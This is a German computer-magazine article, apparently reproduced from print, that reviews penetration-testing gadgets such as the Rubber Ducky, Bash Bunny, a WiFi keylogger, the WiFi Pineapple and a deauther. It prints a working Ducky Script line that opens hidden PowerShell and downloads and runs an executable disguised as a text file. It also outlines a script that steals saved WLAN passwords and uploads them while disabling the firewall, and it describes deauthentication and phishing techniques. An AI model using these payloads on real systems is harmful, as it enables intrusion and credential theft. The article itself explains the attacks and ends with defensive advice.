Ha­cker-Gad­gets

Ist mein Win­dows-PC mit Pro­fi-An­ti­vi­ren­soft­ware und Fi­re­wall si­cher? Si­cher nicht! Die Ge­rä­te in die­sem Ar­ti­kel sind ein­fach zu be­kom­men, leicht zu pro­gram­mie­ren und neh­men so ziem­lich je­de Hür­de, um in ei­nen PC ein­zu­drin­gen.

PC Magazin - - Inhalt - Till E. Spie­gel

Da­mit cra­cken Bö­se­wich­te je­den PC

Sie hei­ßen Rub­ber Du­cky oder Pi­ne­app­le und klin­gen da­mit eher harm­los – aber das trügt. Zahl­rei­che USB- und WLANGad­gets, die preis­lich zwi­schen 20 und 100 Eu­ro lie­gen, be­herr­schen zahl­rei­che Tricks und Knif­fe, um schnell und un­be­merkt in ei­nen PC ein­zu­drin­gen. Nach gut 20 Jah­ren, in de­nen die Si­cher­heits­in­dus­trie ei­ner der wich­tigs­ten IT-Zwei­ge ge­wor­den ist, soll­te es ei­gent­lich kei­ne gro­ßen Lü­cken mehr ge­ben. Ei­gent­lich. Die hier vor­ge­stell­ten Ge­rä­te ge­hö­ren ty­pi­scher­wei­se zum Werk­zeug ei­nes Pe­ne­tra­ti­on-Tes­ters, kurz Pen­tes­ter ge­nannt. Sie sind im Auf­trag ei­nes Un­ter­neh­mens un­ter­wegs, um Schwach­stel­len auf­zu­de­cken und dann da­bei mit­zu­hel­fen, die­se zu schlie­ßen. Man kann sie zum Gu­ten nut­zen, aber na­tür­lich auch zum Ab­hö­ren, Kna­cken und Ab­grei­fen von Da­ten. Das Letz­te­re ist in Deutsch­land und in der EU il­le­gal und straf­bar. So­lan­ge man es nur auf die ei­ge­nen Rech­ner an­wen­det – und da­mit ist nicht die Fa­mi­lie ge­meint, son­dern die per­sön­li­che Hard­ware –, geht das aber als Si­cher­heits­test in Ord­nung. Ins­ge­samt ist die Rechts­la­ge schwie­rig. Es gibt zum Ein­satz sol­cher Ge­rä­te kaum Ge­richts­ur­tei­le und die ein­schlä­gi­gen Rechts­nor­men (sie­he Kas­ten Die Rechts­la­ge) las­sen ge­nug Raum für Du­al Use: Man kann die Ge­rä­te nur zum Gu­ten oder auch für ver­bo­te­ne Ak­tio­nen nut­zen. Da­mit sind sie grund­sätz­lich nicht ver­bo­ten. Den­noch gibt es die meis­ten der vor­ge­stell­ten Ge­rä­te nicht in der EU zu kau­fen, weil die Ent­wick­lung, der Ver­trieb und der Ein­satz (für vie­le Fäl­le) un­ter­sagt ist. Die Ein­fuhr aus den USA und Chi­na, die wir für die­sen Ar­ti­kel ge­tä­tigt ha­ben, war zwar zeit­auf­wän­dig, aber sonst pro­blem­los. Die Lie­fe­rung per Luft­fracht aus den USA hat zwei Wo­chen ge­dau­ert (aus Chi­na vier Wo­chen) und war mit der Zah­lung von Ein­fuhr­um­satz­steu­er und Zoll ver­bun­den. An­bie­ter wie Hak5 ( www.hak5.org) und Kee­log ( www. kee­log.com) und Gre­at Scott Gad­gets ( www. gre­at­s­cott­gad­gets.com) lie­fern di­rekt oder über Partner welt­weit aus.

USB-Teu­fel

Wer hat nicht schon ein­mal ei­nen USBS­tick ge­fun­den? Schnell setzt sich die Neu­gier durch, und man möch­te wis­sen, was drauf ist, ins­be­son­de­re wenn ein Auf­kle­ber wie Fi­nanz­da­ten 2019 drauf­klebt. Viel­leicht ist er ja auch groß und man kann ihn gut brau­chen. Aber das ist kei­ne gu­te Idee. Zum ei­nen könn­te es der USBKill 3.0 sein ( usb kill.com, ca. 55 US-Dol­lar net­to). Er sieht

aus wie ein ge­wöhn­li­cher USB-Spei­cher­stick mit Me­tall­bü­gel, der sich um 180 Grad dre­hen lässt. Steckt man ihn an, er­zeugt er über Kon­den­sa­to­ren ca. 220 Volt Span­nung und lässt die­se über die USBDa­ten­lei­tun­gen mehr­fach pro Se­kun­de auf den Rech­ner los. Das tö­tet die meis­ten PCs und Lap­tops in we­ni­gen Se­kun­den, Smart­pho­nes sind oft ro­bus­ter. Äu­ßer­lich sieht man nichts; aber der Scha­den ist hoch.

Rub­ber Du­cky

Es könn­te aber auch ein Rub­ber Du­cky sein ( www.hak5.org, ca. 45 US-Dol­lar), der ge­nau­so aus­sieht. Wird er an­ge­steckt, mel­det er sich nicht als Spei­cher­stick an son­dern als Tas­ta­tur, und er be­ginnt so­fort, sein „Tas­ta­tur­pro­gramm“ab­zu­spu­len. Er nutzt da­mit das Ver­trau­en aus, dass Rech­ner im all­ge­mei­nen der Tas­ta­tur ent­ge­gen­brin­gen. Die­se wird ja von Men­schen be­dient, die sich vor­her au­then­ti­fi­ziert ha­ben. Des­halb funk­tio­niert der Rub­ber Du­cky auch bei Li­nux, Win­dows- und ma­cOS-Rech­nern. Auch wenn man heut­zu­ta­ge Rech­ner meist nur mit der Maus steu­ert und ein­stellt, sind die Mög­lich­kei­ten per Tas­ta­tur be­deu­tend grö­ßer. Nach ei­ner Tas­ta­tur­fol­ge wie Win­dows-r cmd Ctrl-Shift-Re­turn Pfeil links Re­turn öff­net sich auf je­dem Win­dows-PC ei­ne Kom­man­do­zei­le mit Ad­min-Rech­ten. Jetzt las­sen sich zum Bei­spiel mit dem Kom­man­do netsh um­fang­rei­che Ve­rän­de­run­gen an den Netz­wer­k­ein­stel­lun­gen vor­neh­men oder über ein Po­wers­hell-Skript ei­ne Da­tei aus dem In­ter­net her­un­ter­la­den und aus­füh­ren – mit Ad­min-Rech­ten! Für den Rub­ber Du­cky gibt es ei­ne ein­fa­che Be­fehls- spra­che: Du­cky Script. Sie ist in der La­ge, Tas­ten­drü­cke aus­zu­spie­len, Tex­te aus­zu­ge­ben und War­te­zei­ten ein­zu­hal­ten. Für je­de Spe­zi­al­tas­te wie Pfeil nach oben gibt es ein Kom­man­do wie ARROWUP. Ein Skript, das ei­ne Po­wers­hell öff­net, die ei­ne Da­tei von ei­ner Web­sei­te her­un­ter­lädt (noch mit der En­dung . txt, da­mit der Vi­ren­scan­ner nicht an­schlägt), als aus­führ­ba­re Da­tei spei­chert (En­dung . exe) und dann star­tet, hat nur fünf Zei­len: DELAY 1000 GUI r DELAY 200 STRING po­wers­hell -NoP -NonI -W Hid­den -ExecBy­pass "IEX (New-Ob­ject Sys­tem. Net.We­bC­li­ent).Down­loadFi­le('http:// mein­web.de/calc.txt',\"$env:temp\calc. exe\"); Start-Pro­cess \"$env:temp\calc. exe\"" EN­TER Zu­erst war­tet das Skript ei­ne Se­kun­de (= 1000 Mil­li­se­kun­den), da­mit der Stick als Tas­ta­tur er­kannt und der HID-Trei­ber von Win­dows ge­la­den wird. GUI steht für die Win­dows-Tas­te, GUI r öff­net al­so den Aus­füh­ren-Dia­log. Auch das dau­ert et­was, 200 Mil­li­se­kun­den war­tet das Skript. Dann er­folgt der kom­ple­xe Po­wers­hell-Auf­ruf. Er er­zeugt ein Web-Ob­jekt, um die calc.

txt von mein­web.de her­un­ter­zu­la­den und als calc.exe im temp-Ver­zeich­nis zu spei­chern und an­schlie­ßend aus­zu­füh­ren ( Start-Pro­cess). Mit EN­TER wird das Kom­man­do ge­star­tet. Calc.exe kann jetzt tun und las­sen, was es will. Das ab­ge­druck­te Lis­ting auf der Sei­te ge­gen­über kommt (fast) oh­ne Po­wers­hell aus: Es nutzt die Kom­man­do­zei­le und das Kom­man­do netsh, um für al­le ge­spei­cher­ten WLAN-Net­ze, in die sich das Note­book bis­her ein­ge­loggt und de­ren Pass­wör­ter es ge­spei­chert hat, die Log­in-Da­ten in C:l als XML-Da­tei­en zu spei­chern, per SFTP auf ei­nen Ser­ver hoch­zu­la­den (Ver­zeich­nis

wlan) und al­le Spu­ren zu ver­wi­schen. Da­mit die Fi­re­wall nicht me­ckert, wird sie vor der SFTP-Ak­ti­on de­ak­ti­viert und hin­ter­her wie­der ak­ti­viert. Beim Auf­räu­men löscht das Skript die Da­tei known_hosts in .ssh im Ho­me­ver­zeich­nis und die His­to­ry-Ein­trä­ge im Aus­füh­ren- Dia­log (da­zu braucht es lei­der ei­nen Po­wer­Shell-Auf­ruf). Wer jetzt meint, er müs­se sich da­für erst in­ten­siv mit di­ver­sen Kom­man­dos und der Po­werS­hell aus­ken­nen, liegt zwar rich­tig, aber es gibt na­tür­lich auch ei­ne sehr ak­ti­ve Pen­tes­ter-Com­mu­ni­ty, die be­reits vie­le Skrip­te er­stellt hat und ger­ne teilt. Ein gu­ter Ein­stieg ist https://git­hub.com/hak5d­ar­ren/USB- Rub­ber-Du­cky/wi­ki/Pay­loads. Das In­stal­lie­ren und Ak­ti­vie­ren ei­ner SSH-Shell als Hin­ter­tür ist so ein Kin­der­spiel. Nur we­ni­ges muss man sich selbst an­eig­nen, vie­les lässt sich ko­pie­ren und an­pas­sen.

Skrip­te er­zeu­gen und auf­spie­len

Der Rub­ber Du­cky wird per SD-Kar­te be­stückt, auf die das kom­pi­lier­te Skript kommt. Für die Über­set­zung nimmt man am bes­ten den On­line-Über­set­zer auf www. duck­tool­kit.com. Die fer­ti­ge in­ject.bin ko­piert man auf ei­ne Mi­ni-SD-Kar­te, steckt sie in den Rub­ber Du­cky und die­sen an den PC. Und schon legt er los. Na­tür­lich lässt sich die­ser Stick auch per­fekt ein­set­zen, um an zahl­rei­chen PCs in der ei­ge­nen Fir­ma An­pas­sun­gen vor­zu­neh­men. So muss der Ad­min nur von Rech­ner zu Rech­ner ge­hen, den Stick an­ste­cken und dann wei­ter­zie­hen. Von Haus aus mel­det sich der Rub­ber Du­cky nur als Tas­ta­tur an. Es gibt aber auch al­ter­na­ti­ve Firm­ware wie Twin­duck, die die SD-Kar­te als Mas­sen­spei­cher ein­bin­det. So las­sen sich Da­ten vom PC leicht auf den Rub­ber Du­cky ko­pie­ren oder aus­führ­ba­re Da­tei­en star­ten. Ge­ra­de bei Fir­men­rech­nern ist das Ein­bin­den von USB-Mas­sen­spei­chern al­ler­dings oft un­ter­bun­den. Skrip­te, die sich dar­auf ver­las­sen (müs­sen),

dass der Mas­sen­spei­cher vor­han­den ist, schei­tern dann. Der Mer­ce­des un­ter den USB-Ha­cker-Gad­gets ist das Bash Bun­ny (auch von www. hak5.org, 100 US-Dol­lar), der deut­lich grö­ßer und teu­rer ist, aber auch ei­nen kom­plet­ten Li­nux-PC ent­hält. Er mel­det sich per USB nicht nur als Tas­ta­tur, son­dern auch noch als Mas­sen­spei­cher und als Et­her­net-USBAd­ap­ter an, und hat ei­ne Quad-Co­re-CPU und ei­ne schnel­le SSD ein­ge­baut.

USB-Key­log­ger mit WLAN

Als drit­tes, beliebtes USB-Ha­cker-Gad­get gel­ten Key­log­ger, die zwi­schen Rech­ner und Tas­ta­tur ge­steckt wer­den, mög­lichst un­schein­bar aus­se­hen und al­le Tas­ten­drü­cke in­klu­si­ve Pass­wör­tern mit­schnei­den. Im bes­ten Sin­ne dient so ein Stick als Back­up, wenn man vie­le Tex­te schreibt oder sei­ne Kin­der über­wa­chen möch­te; meist aber ist der Ein­satz il­le­gal. Ein be­son­ders aus­ge­fuchs­tes Teil ist das Air­dri­ve von Kee­log ( www.kee­log.com, 40 bis 90 US-Dol­lar), das WLAN ein­ge­baut hat und in den teu­ren Va­ri­an­ten die Ein­ga­ben so­gar per E-Mail ver­schi­cken kann. Es ist mit 21 mm ex­trem kurz. Wenn man dar­auf ei­nen klei­nen Lo­gi­tech-USB-Re­cei­ver steckt, ist der Key­log­ger kaum zu er­ken­nen. Der Key­log­ger schnei­det al­le Tas­ta­tur­drü­cke mit und kann re­mo­te per WLAN an­ge­spro­chen wer­den (spannt al­so ein ei­ge­nes, un­sicht­ba­res WLAN auf). In der Pro-Ver­si­on (56 US-Dol­lar) kann sich der Stick so­gar in ein WLAN ein­log­gen und E-Mails ver­schi­cken und Tas­ten­drü­cke li­ve strea­men. Im Ge­gen­satz zu Key­log­ging-Soft­ware ist das USB-Ge­rät für den Rech­ner nicht zu er­ken­nen. Es taugt aber nur für Desk­top-PCs, da es an Note­books so­fort auf­fällt.

Ge­rä­te für WLAN-Hacks

Hat man kei­nen Zu­griff auf die Ge­rä­te, die man tes­ten oder ha­cken möch­te, bleibt fast nur die Mög­lich­keit, dies per Funk, al­so Blue­tooth oder WLAN zu tun. Ein WLAN ist ein so ge­nann­tes Sha­red Me­di­um: Je­der in Reich­wei­te kann al­le Bits- und By­tes mit­hö­ren und selbst ak­tiv wer­den. Es ver­hält sich so, als wür­de man ein Et­her­net-Ka­bel aus dem Fens­ter hän­gen und das En­de auf den Bür­ger­steig le­gen. Aus die­sem Grund wird seit Jah­ren über­all dar­auf ge­drängt, WLAN-Net­ze im­mer per WPA/WPA2-Ver­schlüs­se­lung zu si­chern. Im pri­va­ten Be­reich hat sich das durch­ge-

setzt; bei öf­fent­li­chen Net­zen im Flug­ha­fen, im Zug oder im Ca­fé gilt das meist nicht. Wer sich hier ein­loggt und nicht so­fort ei­ne VPN-Ver­bin­dung zur hei­mi­schen Fritz!Box auf­baut, surft qua­si öf­fent­lich, so als könn­te man auf ei­nem Groß­dis­play mit­schau­en, was er oder sie ge­ra­de an­schaut. Das pas­sen­de Gad­get, um den kom­plet­ten Funk­ver­kehr mit­zu­schnei­den, ge­türk­te WLAN-Net­ze auf­zu­span­nen und WLANNut­zer auf ei­ne Phis­hing-Sei­te zu lo­cken, ist der Wi­fi Pi­ne­app­le Na­no ( www.hak5.org, 100 US-Dol­lar). Das ak­tu­el­le Ge­rät ist be­reits die sechs­te Ge­ne­ra­ti­on, hat ei­ne mo­der­ne We­bo­b­er­flä­che und lässt sich mit ei­ner USB-Po­wer­bank sehr gut mo­bil be­trei­ben. An An­schlüs­sen hat das Ge­rät ei­nen SDCard-Slot für Er­wei­te­run­gen und Logs, ei­ne USB-Schnitt­stel­le (Ste­cker USB-Typ A), die das Ge­rät als Netz­werk­schnitt­stel­le an ei­nem PC an­mel­det und dar­über auch mit Strom ver­sorgt, ei­ne USB-Buch­se, um ei­nen WLAN- oder UMTS-Stick oder An­dro­idHan­dy (im Te­the­ring-Mo­dus) an­zu­schlie­ßen und zwei WLAN-An­ten­nen (für zwei un­ab­hän­gi­ge WLAN-Net­ze). Nach dem An­schrau­ben der An­ten­nen und dem erst­ma­li­gen An­schluss am PC kann man so­fort per 172.16.42.1:1471 das We­bIn­ter­face auf­ru­fen. Als Ers­tes muss die ak­tu­el­le Firm­ware her­un­ter­ge­la­den und in­stal­liert wer­den. Da­nach gilt es, Log­in-Da­ten fest­zu­le­gen und an­de­re Ein­stel­lun­gen vor­zu­neh­men, und dann kann das fröh­li­che Ana­ly­sie­ren schon los­ge­hen. Als Soft­ware kommt ei­ne Ei­gen­ent­wick­lung auf OpenWRT-Ba­sis zum Ein­satz. Das Sys­tem ist sehr mo­du­lar. Von der Ober­flä­che aus las­sen sich be­lie­bi­ge wei­te­re Mo­du­le aus ei­ner Bi­b­lio­thek aus­wäh­len, in­stal­lie­ren und star­ten. Aber auch in der Gr­und­aus­stat­tung bie­tet der Pi­ne­app­le schon ei­ni­ges. So kann er zum Bei­spiel ei­ne Lis­te al­ler WLAN-Netz­wer­ke und der dort ak­ti­ven WLAN-Cli­ents er­stel­len. Sie wer­den an­hand ih­rer MAC-Adres­se (MAC steht für Me­dia Ac­cess Con­trol) auf­ge­lis­tet und las­sen sich dann ein­fach in Fil­ter- und Tracking­lis­ten über­neh­men. An­hand der ers­ten drei By­tes der MAC-Adres­se er­mit­telt der Pi­ne­app­le für je­des Ge­rät den Her­stel­ler (et­wa Hua­wei oder Apple). Mo­der­ne Smart­pho­nes sind üb­ri­gens nie ganz aus­ge­schal­tet. Sie su­chen stän­dig nach ih­nen be­kann­ten Netz­wer­ken in der Um­ge­bung. Die­se Pro­be- und As­so­zia­ti­ons­Re­quest kann der Pi­ne­app­le mit­schrei­ben und in ei­ne Lis­te über­füh­ren. Die­se füllt sich enorm schnell. Er kann sol­che An­fra­gen al­ler­dings auch al­le po­si­tiv be­ant­wor- ten oder die so er­mit­tel­ten SSIDs broad­cas­ten – al­so so tun, als gä­be es die an­ge­frag­ten Ac­cess-Points in der nächs­ten Um­ge­bung. Sucht ein Smart­pho­ne al­so nach be­kann­ten WLAN-Ac­cess-Points kann man es di­rekt zum Pi­ne­app­le lo­cken. Soll­te es je­doch kei­nen Wech­sel­wil­len er­ken­nen las­sen (weil es mit ei­nem star­ken WLAN-Ac­cess-Po­int in di­rek­ter Um­ge­bung ver­bun­den ist), lässt sich der Wech­sel auch for­cie­ren: Das Ver­fah­ren nennt sich De­au­then­ti­fi­ca­ti­on.

Al­les raus hier

Da­bei nutzt der Pi­ne­app­le ei­ne Si­cher­heits­lü­cke aus, die laut 802.11w-2009 ei­gent­lich schon längst von al­len Ac­cess-Po­int-Her­stel­lern ge­schlos­sen sein soll­te – aber es sel­ten ist. Ein Ge­rät wie der Pi­ne­app­le oder auch Wi­Fi De­au­ther von DSTIKE kön­nen ge­zielt Ab­mel­de- Kom­man­dos an Ge­rä­te wie Smart­pho­nes und Note­books ver­schi­cken (in schnel­ler Fol­ge). Die­se ak­zep­tie­ren die­se Kom­man­dos und mel­den sich selbst aus dem ak­tu­el­len WLAN ab. Da­mit ist der ers­te Schritt ge­tan, sich an ei­ner be­kann­ten SSID (die aber vom Pi­ne­app­le kommt) an­zu­mel­den. Die­ser kann dann zum ei­nen den kom­plet­ten Netz­werk-Ver­kehr mit­hö­ren und da­bei ge­zielt Log­in- und Pass­wort-Ein­ga­ben von un­ver­schlüs­sel­ten Diens­ten (HTTP, FTP, POP3, IMAP oder SMB) aus­spä­hen. Na­tür- lich ist auch ei­ne Um­lei­tung von An­fra­gen auf Ex­ploit-Sei­ten mög­lich, die ak­tu­el­le Si­cher­heits­lü­cken aus­nut­zen oder ei­ne Phis­hing-Sei­te, die man selbst an­ge­legt hat. Wer üb­ri­gens nur sei­ne Kin­der dis­zi­pli­nie­ren will, kann mit dem Wi­Fi De­au­ther von DSTIKE, von dem es meh­re­re Mo­del­le ab zir­ka 10 US-Dol­lar gibt ( https://dstike.ali ex­press.com/sto­re/2996024), auch ge­zielt die Kin­der aus dem WLAN schmei­ßen, wenn die Me­di­en­zeit um ist. Es braucht nur Strom und läuft auch an ei­ner mo­bi­len Po­wer­bank. Die et­was teu­re­ren Mo­del­le ha­ben noch ein sehr schar­fes OLED-Dis­play und ei­ne Schal­ter­wip­pe, um Ge­rä­te oder Ac­cess Points di­rekt aus­zu­wäh­len. So­wohl der Pi­ne­app­le Na­no als auch die De­au­ther-Bo­ards von DSTIKE fun­ken al­ler­dings nur in 2,4-GHz-Net­zen. Der Pi­ne­app­le Te­tra be­herrscht auch 5-GHz-Fre­quen­zen, ist aber deut­lich teu­rer.

Fa­zit

Wer nur ein we­nig mit den ge­nann­ten Ge­rä­ten her­um­spielt, merkt schnell: „Mein Rech­ner ist bes­ser durch Ge­set­ze als durch Tech­nik ge­schützt“. Das An­ste­cken ei­nes un­be­kann­ten USB-Sticks, den man ge­fun­den hat, soll­te man nur auf al­ten Note­books wa­gen, die da­bei ka­putt ge­hen dür­fen und nicht im Netz­werk hän­gen. Und wer in öf­fent­li­chen WLANs un­ter­wegs ist, soll­te als ers­tes ei­ne VPN-Ver­bin­dung auf­bau­en und un­ge­schütz­te Web­sei­ten (HTTP oh­ne S) mei­den. Es lohnt manch­mal auch zu gu­cken, über wel­ches WLAN das ei­ge­ne Smart­pho­ne ge­ra­de un­ter­wegs ist. Au­ßer­halb der ei­ge­nen vier Wän­de kann es so­gar sinn­voll sein, das WLAN ein­fach ab­zu­schal­ten. An­grif­fe übers Mo­bil­funk­netz sind nicht un­mög­lich, aber schwie­ri­ger und er­for­dern teu­re­re Tech­nik.

Mit den ent­spre­chen­den Ein­stel­lun­gen sam­melt Pi­ne­app­le Na­no al­le WLAN-An­fra­gen al­ler Ge­rä­te in der Um­ge­bung (SSID Pool rechts). Be­son­ders nett: BKA_Ue­ber­tra­gungs wa­gen_250!

Im Shop von Hak5 (https://shop.hak5. org) gibt es zahl­rei­che Hacking-Gad­gets und ei­ni­ge sehr in­ter­es­san­te Vi­de­os, wel­che die Gad­gets und Tech­ni­ken vor­stel­len.

Beim Scan al­ler Ge­rä­te in der Um­ge­bung (Re­con) fin­det der Pi­ne­app­le Na­no zahl­rei­che Ac­cess Points und dort an­ge­mel­de­te WLANGe­rä­te.

Zum Rub­ber Du­cky ge­hö­ren die Ge­häu­se­tei­le, ein SD-Card-Re­a­der, die Kar­te und ein USB-Ad­ap­ter.

Mit An­ten­ne und Strom­ver­sor­gung per USB ist der Wi­Fi De­au­ther sehr kom­pakt. Das OLEDDis­play ist gut les­bar.

Der Wi­Fi De­au­ther in Ak­ti­on: Bei 52 Pro­zent hat er schon neun Ac­cess Points und sechs Ge­rä­te ge­fun­den.

Das In­nen­le­ben des Rub­ber Du­cky passt lo­cker in das mit­ge­lie­fer­te schwar­ze Ge­häu­se.

Mit Po­wer­bank, Wi­Fi Pi­ne­app­le und Mi­ni-PC steht ei­nem Out­door-Ein­satz nichts im We­ge. Das An­dro­id-Ge­rät kann da­bei so­gar als mo­bi­ler In­ter­net­Zu­gang ge­nutzt wer­den.

Das Pi­ne­app­le Na­no ist ein mo­bi­ler Rech­ner mit Li­nux und vier Netz­wer­ken: 2x WLAN, ein­mal USB-Netz­werk und ei­nem USB-An­schluss für ei­nen mo­bi­len LTE-Stick oder ein An­dro­id-Pho­ne.

Newspapers in German

Newspapers from Germany

© PressReader. All rights reserved.